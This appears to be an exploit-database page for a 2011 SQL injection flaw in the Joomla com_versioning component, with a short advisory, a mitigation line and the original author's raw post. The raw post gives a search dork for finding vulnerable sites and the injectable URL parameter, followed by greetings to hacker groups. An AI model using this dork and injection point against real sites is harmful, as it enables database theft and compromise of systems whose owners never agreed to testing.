header-logo
Suggest Exploit
vendor:
com_versioning
by:
the_cyber_nuxbie
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_versioning
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

SQL Injection Vulnerability in Joomla com_versioning Component

A SQL injection vulnerability exists in the Joomla com_versioning component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, modify data, execute administration operations on the database, and potentially compromise the system.

Mitigation:

Upgrade to the latest version of Joomla com_versioning component.
Source

Exploit-DB raw data:

#[~] Author : the_cyber_nuxbie
#[~] Home   : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found  : 09 Mei 2011.
#[~] Tested : Windows 7 Ultimate 32bit Bajakan.
#[!] Dork   : inurl:"com_versioning"
______________________________________________________________

[x] X.P.L:
../public_html/index.php?option=com_versioning&sectionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!!

- Shout & Greetz:
All Member & Staff SekuritiOnline    | www.sekuritionline.net
All Member & Staff YogyaFamilyCode   | www.xcode.or.id
All Member & Staff Devilzc0de        | www.devilzc0de.org
All Member & Staff Hacker-Newbie     | www.hacker-newbie.org
All Member & Staff ECHO              | www.echo.or.id
All Member & Staff WhiteCyber        | www.whitecyber.net
All Member & Staff MuslemHacker      | www.muslimhackers.net
All Member & Staff BinusHacker       | www.binushacker.net
All Member & Staff Jasakom           | www.jasakom.com
All Member & Staff YogyaCarderLink.  | www.yogyacarderlink.web.id
All Member & Staff IndonesianDefacer | www.indonesiandefacer.org
All Member & Staff IndonesianCoder   | www.indonesiancoder.com
All Member & Staff MagelangCyber     | www.magelangcyber.web.id
All Member & Staff Jatim-Crew        | www.jatimcrew.org
All Member & Staff Fast-Hacker       | www.fasthacker.org
And all forum / community cyber se-antero indonesia. :-D
,etc...

Sorry masbro...
Aye masih nyubi... :-D
Jangan menghina aye donk... :-(
Bruakakakakakak... :-D

- Mei 09 2011, GMT +09:35 Solo Raya, Indonesia.

Navigation

Suggest Exploit

Services By CQR